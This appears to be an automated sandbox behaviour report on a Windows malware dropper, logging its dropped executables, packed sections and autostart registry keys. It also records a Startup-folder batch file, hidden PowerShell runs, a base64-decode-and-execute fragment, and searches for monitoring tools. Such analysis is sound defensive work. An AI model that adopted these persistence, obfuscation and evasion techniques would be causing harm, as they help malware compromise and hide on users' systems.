Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: tmpDACD.tmp.61.dr	LNK file: ..\..\..\..\..\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Source: tmp7B84.tmp.61.dr	LNK file: ..\..\..\..\..\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Mc3FDUMnVz.exe

Static file information: File size 2128896 > 1048576

Source: Mc3FDUMnVz.exe

Static PE information: Raw size of shlcppqz is bigger than: 0x100000 < 0x19bc00

Source:	Binary string: Purpose.pdb source: Ryu8yUx.exe, 0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, Ryu8yUx.exe, 0000000C.00000000.78919175290.00000000006A2000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: UN8QxIq.exe, 00000011.00000002.79041042505.00007FF6E0001000.00000040.00000001.01000000.0000000E.sdmp, covxzxzipzly.exe, 0000003A.00000002.79057637370.00007FF602461000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: UN8QxIq.exe, UN8QxIq.exe, 00000011.00000002.79041042505.00007FF6E0001000.00000040.00000001.01000000.0000000E.sdmp, covxzxzipzly.exe, covxzxzipzly.exe, 0000003A.00000002.79057637370.00007FF602461000.00000040.00000001.01000000.0000000F.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Unpacked PE file: 0.2.Mc3FDUMnVz.exe.fa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.260000.0.unpack :EW;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.260000.0.unpack :EW;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Unpacked PE file: 17.2.UN8QxIq.exe.7ff6dfd30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;derejphm:EW;yopayayr:EW;.pdata:R;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;derejphm:EW;yopayayr:EW;.pdata:R;.taggant:EW;
Source: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe	Unpacked PE file: 58.2.covxzxzipzly.exe.7ff602190000.0.unpack :EW;.rsrc:W;.idata :W; :EW;derejphm:EW;yopayayr:EW;.pdata:R;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;derejphm:EW;yopayayr:EW;.pdata:R;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Unpacked PE file: 61.2.ViGgA8C.exe.f20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ghsupnpm:EW;ojxuibvw:EW;.taggant:EW; vs :ER;.rsrc:W;

.NET source code contains method to dynamically call methods (often used by packers)

Source: Ryu8yUx[1].exe.4.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: RQsQTTbUYeEtZ5KVMrb(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{RQsQTTbUYeEtZ5KVMrb(typeof(IntPtr).TypeHandle),RQsQTTbUYeEtZ5KVMrb(typeof(Type).TypeHandle)})
Source: Ryu8yUx.exe.4.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: RQsQTTbUYeEtZ5KVMrb(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{RQsQTTbUYeEtZ5KVMrb(typeof(IntPtr).TypeHandle),RQsQTTbUYeEtZ5KVMrb(typeof(Type).TypeHandle)})
Source: 12.2.Ryu8yUx.exe.3b79550.0.raw.unpack, gBMthepoZSL1ZVKpeA.cs	.Net Code: RQsQTTbUYeEtZ5KVMrb(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{RQsQTTbUYeEtZ5KVMrb(typeof(IntPtr).TypeHandle),RQsQTTbUYeEtZ5KVMrb(typeof(Type).TypeHandle)})

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($encoded))Invoke-Expression $decoded@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

Source: Ryu8yUx[1].exe.4.dr

Static PE information: 0xDA43F2C8 [Mon Jan 14 22:35:52 2086 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: ViGgA8C[1].exe.4.dr	Static PE information: real checksum: 0x1c71ac should be: 0x1ca1ff
Source: WveK4j1[1].exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x4c3f9
Source: random[1].exe.4.dr	Static PE information: real checksum: 0x644053 should be: 0x64687b
Source: 439c2c3c87.exe.4.dr	Static PE information: real checksum: 0x644053 should be: 0x64687b
Source: Ryu8yUx[1].exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x6a36b
Source: ViGgA8C.exe.4.dr	Static PE information: real checksum: 0x1c71ac should be: 0x1ca1ff
Source: tmp7BA6.tmp.61.dr	Static PE information: real checksum: 0x210c5e should be: 0x2169d1
Source: random[1].exe1.4.dr	Static PE information: real checksum: 0x1dc613 should be: 0x1d8853
Source: 23a60cad74.exe.4.dr	Static PE information: real checksum: 0x1dc613 should be: 0x1d8853
Source: WveK4j1.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x4c3f9
Source: Ryu8yUx.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x6a36b
Source: covxzxzipzly.exe.17.dr	Static PE information: real checksum: 0x4aab56 should be: 0x4b6f72
Source: UN8QxIq.exe.4.dr	Static PE information: real checksum: 0x4aab56 should be: 0x4b6f72
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x210c5e should be: 0x2169d1
Source: Mc3FDUMnVz.exe	Static PE information: real checksum: 0x210c5e should be: 0x2169d1
Source: UN8QxIq[1].exe.4.dr	Static PE information: real checksum: 0x4aab56 should be: 0x4b6f72

Source: Mc3FDUMnVz.exe	Static PE information: section name:
Source: Mc3FDUMnVz.exe	Static PE information: section name: .idata
Source: Mc3FDUMnVz.exe	Static PE information: section name:
Source: Mc3FDUMnVz.exe	Static PE information: section name: shlcppqz
Source: Mc3FDUMnVz.exe	Static PE information: section name: uglmbbpk
Source: Mc3FDUMnVz.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: shlcppqz
Source: skotes.exe.0.dr	Static PE information: section name: uglmbbpk
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.4.dr	Static PE information: section name:
Source: random[1].exe.4.dr	Static PE information: section name: .idata
Source: random[1].exe.4.dr	Static PE information: section name: xfzagxka
Source: random[1].exe.4.dr	Static PE information: section name: wwxeoydf
Source: random[1].exe.4.dr	Static PE information: section name: .taggant
Source: 439c2c3c87.exe.4.dr	Static PE information: section name:
Source: 439c2c3c87.exe.4.dr	Static PE information: section name: .idata
Source: 439c2c3c87.exe.4.dr	Static PE information: section name: xfzagxka
Source: 439c2c3c87.exe.4.dr	Static PE information: section name: wwxeoydf
Source: 439c2c3c87.exe.4.dr	Static PE information: section name: .taggant
Source: UN8QxIq[1].exe.4.dr	Static PE information: section name:
Source: UN8QxIq[1].exe.4.dr	Static PE information: section name: .idata
Source: UN8QxIq[1].exe.4.dr	Static PE information: section name:
Source: UN8QxIq[1].exe.4.dr	Static PE information: section name: derejphm
Source: UN8QxIq[1].exe.4.dr	Static PE information: section name: yopayayr
Source: UN8QxIq[1].exe.4.dr	Static PE information: section name: .pdataI
Source: UN8QxIq[1].exe.4.dr	Static PE information: section name: .taggant
Source: UN8QxIq.exe.4.dr	Static PE information: section name:
Source: UN8QxIq.exe.4.dr	Static PE information: section name: .idata
Source: UN8QxIq.exe.4.dr	Static PE information: section name:
Source: UN8QxIq.exe.4.dr	Static PE information: section name: derejphm
Source: UN8QxIq.exe.4.dr	Static PE information: section name: yopayayr
Source: UN8QxIq.exe.4.dr	Static PE information: section name: .pdataI
Source: UN8QxIq.exe.4.dr	Static PE information: section name: .taggant
Source: ViGgA8C[1].exe.4.dr	Static PE information: section name:
Source: ViGgA8C[1].exe.4.dr	Static PE information: section name: .idata
Source: ViGgA8C[1].exe.4.dr	Static PE information: section name:
Source: ViGgA8C[1].exe.4.dr	Static PE information: section name: ghsupnpm
Source: ViGgA8C[1].exe.4.dr	Static PE information: section name: ojxuibvw
Source: ViGgA8C[1].exe.4.dr	Static PE information: section name: .taggant
Source: ViGgA8C.exe.4.dr	Static PE information: section name:
Source: ViGgA8C.exe.4.dr	Static PE information: section name: .idata
Source: ViGgA8C.exe.4.dr	Static PE information: section name:
Source: ViGgA8C.exe.4.dr	Static PE information: section name: ghsupnpm
Source: ViGgA8C.exe.4.dr	Static PE information: section name: ojxuibvw
Source: ViGgA8C.exe.4.dr	Static PE information: section name: .taggant
Source: random[1].exe1.4.dr	Static PE information: section name:
Source: random[1].exe1.4.dr	Static PE information: section name: .idata
Source: random[1].exe1.4.dr	Static PE information: section name:
Source: random[1].exe1.4.dr	Static PE information: section name: qdrbyomc
Source: random[1].exe1.4.dr	Static PE information: section name: pealrcle
Source: random[1].exe1.4.dr	Static PE information: section name: .taggant
Source: 23a60cad74.exe.4.dr	Static PE information: section name:
Source: 23a60cad74.exe.4.dr	Static PE information: section name: .idata
Source: 23a60cad74.exe.4.dr	Static PE information: section name:
Source: 23a60cad74.exe.4.dr	Static PE information: section name: qdrbyomc
Source: 23a60cad74.exe.4.dr	Static PE information: section name: pealrcle
Source: 23a60cad74.exe.4.dr	Static PE information: section name: .taggant
Source: covxzxzipzly.exe.17.dr	Static PE information: section name:
Source: covxzxzipzly.exe.17.dr	Static PE information: section name: .idata
Source: covxzxzipzly.exe.17.dr	Static PE information: section name:
Source: covxzxzipzly.exe.17.dr	Static PE information: section name: derejphm
Source: covxzxzipzly.exe.17.dr	Static PE information: section name: yopayayr
Source: covxzxzipzly.exe.17.dr	Static PE information: section name: .pdataI
Source: covxzxzipzly.exe.17.dr	Static PE information: section name: .taggant
Source: tmp7BA6.tmp.61.dr	Static PE information: section name:
Source: tmp7BA6.tmp.61.dr	Static PE information: section name: .idata
Source: tmp7BA6.tmp.61.dr	Static PE information: section name:
Source: tmp7BA6.tmp.61.dr	Static PE information: section name: shlcppqz
Source: tmp7BA6.tmp.61.dr	Static PE information: section name: uglmbbpk
Source: tmp7BA6.tmp.61.dr	Static PE information: section name: .taggant

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046C5379 pushad ; iretd	5_2_046C5399
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046C53A0 pushfd ; iretd	5_2_046C53A9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046CB9A0 push esp; ret	5_2_046CC361
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0044C050 push edx; ret	13_2_0044C051
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00444BF0 push eax; mov dword ptr [esp], A1A0A796h	13_2_00444BF2
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0044EDE8 push edi; iretd	13_2_0044EDF9
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000028559F0ACDD push rcx; retf 003Fh	14_2_0000028559F0ACDE
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000028559F3C6DD push rcx; retf 003Fh	14_2_0000028559F3C6DE

Source: Mc3FDUMnVz.exe	Static PE information: section name: entropy: 7.131647028097189
Source: Mc3FDUMnVz.exe	Static PE information: section name: shlcppqz entropy: 7.952810524743205
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.131647028097189
Source: skotes.exe.0.dr	Static PE information: section name: shlcppqz entropy: 7.952810524743205
Source: UN8QxIq[1].exe.4.dr	Static PE information: section name: derejphm entropy: 7.953735748286033
Source: UN8QxIq.exe.4.dr	Static PE information: section name: derejphm entropy: 7.953735748286033
Source: ViGgA8C[1].exe.4.dr	Static PE information: section name: entropy: 7.974002791295328
Source: ViGgA8C[1].exe.4.dr	Static PE information: section name: ghsupnpm entropy: 7.952946007605355
Source: ViGgA8C.exe.4.dr	Static PE information: section name: entropy: 7.974002791295328
Source: ViGgA8C.exe.4.dr	Static PE information: section name: ghsupnpm entropy: 7.952946007605355
Source: random[1].exe1.4.dr	Static PE information: section name: entropy: 7.9769124037947465
Source: random[1].exe1.4.dr	Static PE information: section name: qdrbyomc entropy: 7.954221420727547
Source: 23a60cad74.exe.4.dr	Static PE information: section name: entropy: 7.9769124037947465
Source: 23a60cad74.exe.4.dr	Static PE information: section name: qdrbyomc entropy: 7.954221420727547
Source: covxzxzipzly.exe.17.dr	Static PE information: section name: derejphm entropy: 7.953735748286033
Source: tmp7BA6.tmp.61.dr	Static PE information: section name: entropy: 7.131647028097189
Source: tmp7BA6.tmp.61.dr	Static PE information: section name: shlcppqz entropy: 7.952810524743205

Source: Ryu8yUx[1].exe.4.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'iJ7hGcJiZtrY1vmTXS1', 'l3eRiSJQRS1T675dhDw', 'reTlcDMFua', 'BxhRGVJ7kheGMf3Py2t', 'gg3ZFVJakBdVFuZCIgG', 'G5c3kgJhorWWcabQiWI', 'Gim47mJIx9UyjsEXoD7', 'ItKq8kJ0OyIS0T9lLUQ', 'N6HgC6J6Gp0JEvuuieG', 'g4UifPJHxIeKxNQ4Axj'
Source: Ryu8yUx.exe.4.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'iJ7hGcJiZtrY1vmTXS1', 'l3eRiSJQRS1T675dhDw', 'reTlcDMFua', 'BxhRGVJ7kheGMf3Py2t', 'gg3ZFVJakBdVFuZCIgG', 'G5c3kgJhorWWcabQiWI', 'Gim47mJIx9UyjsEXoD7', 'ItKq8kJ0OyIS0T9lLUQ', 'N6HgC6J6Gp0JEvuuieG', 'g4UifPJHxIeKxNQ4Axj'
Source: 12.2.Ryu8yUx.exe.3b79550.0.raw.unpack, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'iJ7hGcJiZtrY1vmTXS1', 'l3eRiSJQRS1T675dhDw', 'reTlcDMFua', 'BxhRGVJ7kheGMf3Py2t', 'gg3ZFVJakBdVFuZCIgG', 'G5c3kgJhorWWcabQiWI', 'Gim47mJIx9UyjsEXoD7', 'ItKq8kJ0OyIS0T9lLUQ', 'N6HgC6J6Gp0JEvuuieG', 'g4UifPJHxIeKxNQ4Axj'

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\WveK4j1[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1074040001\439c2c3c87.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	File created: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\ViGgA8C[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\Ryu8yUx[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1074030001\bb6a39dc63.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\UN8QxIq[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File created: C:\Users\user\AppData\Local\Temp\tmp7BA6.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe

File created: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bb6a39dc63.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1038363cd2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 23a60cad74.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4fc87a30ef.exe	Jump to behavior

Drops script or batch files to the startup folder

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat

Jump to dropped file

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Window searched: window name: FilemonClass	Jump to behavior
